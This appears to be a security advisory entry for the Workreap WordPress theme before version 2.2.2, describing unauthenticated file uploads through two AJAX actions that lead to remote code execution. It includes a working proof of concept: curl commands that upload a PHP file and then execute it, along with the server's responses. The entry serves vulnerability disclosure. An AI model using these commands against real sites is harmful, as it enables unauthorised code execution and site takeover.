Lucene search

K
wpexploitHarald Eilertsen (Jetpack)WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB
HistoryJul 02, 2021 - 12:00 a.m.

Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

2021-07-0200:00:00
Harald Eilertsen (Jetpack)
99

The theme’s AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.

% curl -F 'action=workreap_award_temp_file_uploader' -F [email protected] 'http://example.com/wp-admin/admin-ajax.php'
{"type":"success","message":"File uploaded!","thumbnail":"http:\/\/example.com\/wp-content\/uploads\/workreap-temp\/malicious.php","name":"malicious.php","size":"24.00 B"}

% curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php'
PWNED!